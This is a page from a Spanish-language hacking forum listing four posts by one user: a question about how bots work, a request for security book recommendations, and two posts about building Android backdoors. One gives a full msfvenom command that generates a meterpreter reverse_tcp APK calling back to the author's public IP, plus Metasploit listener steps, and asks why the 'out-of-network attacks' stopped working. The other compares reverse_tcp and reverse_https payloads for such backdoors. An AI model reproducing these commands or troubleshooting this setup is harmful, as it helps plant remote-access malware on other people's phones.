elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Temas
Páginas: 1 2 [3]
21  Seguridad Informática / Hacking / Bots? que son y como funcionan? en: 11 Abril 2020, 16:02 pm
Hola a todo aquel que esté leyendo este post.
Llevo ya algunos años estudiando automatización industrial en la universidad y hasta ha ahora he sido capaz de crear autómatas programables que son básicamente pequeños robots que automatizan procesos industriales, incluso mi pc tiene algunas partes automatizadas, ventiladores que aumentan o disminuyen su velocidad dependiendo de la temperatura en el ambiente.

Solo sé contruir sistemas automáticos analógios y programarlos con arduino, aún no tengo mucho conocimiento sobre la automatización digital y hasta donde tengo entendido un bot es básicamente lo mismo, un programa que automatiza procesos de cualquier tipo, y me interesa mucho la automatización y la inteligencia artifical.

Entonces me preguntaba si alguien aquí sabe donde puedo encontrar información sobre el tema de los bots, o si ya hay algún tipo de información sobre eso en este foro, como funcionan y como interactuan con los demás programas, sería de gran utilidad.

(No sé si mi post está mal ubicado, de ser así haganmelo saber por favor, no tengo mucha experiencia en foros)

Gracias
22  Seguridad Informática / Hacking / Libros que recomienden? en: 14 Marzo 2020, 09:34 am
Hola, hay algún libro en particular que recomienden y que pueda aportar al aprendizaje de seguridad informática? Acepto cualquier sugerencia, libros sobre redes, tutoriales, técnicas, programas, lo que sea, gracias.
23  Seguridad Informática / Hacking / Problema, ataques fuera de red. en: 6 Marzo 2020, 04:21 am
Hola, hace días que estuve probando ataques fuera de red utilizando apk's creadas con msfvenom. Al principio funcionaba todo correctamente, configuré mi ip local como DMZ de mi router para evitar problemas con los puertos, e incluso pude utilizar NO-IP con normalidad.

El problema es que hace un día o dos, simplemente han dejado de funcionarme los ataques fuera de red, Kali cambió la ip local de mi máquina pero inmediatamente actualicé el DMZ de mi router. Entonces pensé que podría ser un problema de NO-IP y decidí generar las apk's directamente con mi mi pública, de la siguiente manera.

msfvenom -p android/meterpreter/reverse_tcp  lhost=<mi ip publica>  lport=4444 R>/root/Escritorio/aplicacion.apk

Luego de haber generado la aplicación me pongo a la escucha de la siguiente forma.

1) use exploit/multi/hander
2) set payload android/meterpreter/reverse_tcp
3) set lport=<mi ip local> y también set lport=444
5) exploit

Aún configurando la aplicación de esa manera sigue sin funcionar  :-\
¿Alguien tiene alguna idea de qué puede estar ocasionando este problema o como solucionarlo?

¿podría el cambio de ip haber ocasionado eso? Cambió tanto mi ip pública, como la local.


Gracias.
24  Seguridad Informática / Hacking / reverse_tcp o reverse_https? en: 29 Febrero 2020, 04:30 am
Hola, hace poco que inicie a familiarizarme con kali linux y sus herramientas. He estado creando Backdoors para android con mfsvenom utilizando el siguiente payload:

android/meterpreter/reverse_tcp

Pero hace poco me di cuenta viendo algunos tutoriales que algunas personas lo utilizan de esta manera:

android/meterpreter/reverse_https


Alguien podría aclararme que diferencia hay entre los dos?
O si es más conveniente usar uno u otro en casos específicos.

Cualquier otra información adicional me vendría de maravilla. Gracias.  :D
Páginas: 1 2 [3]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines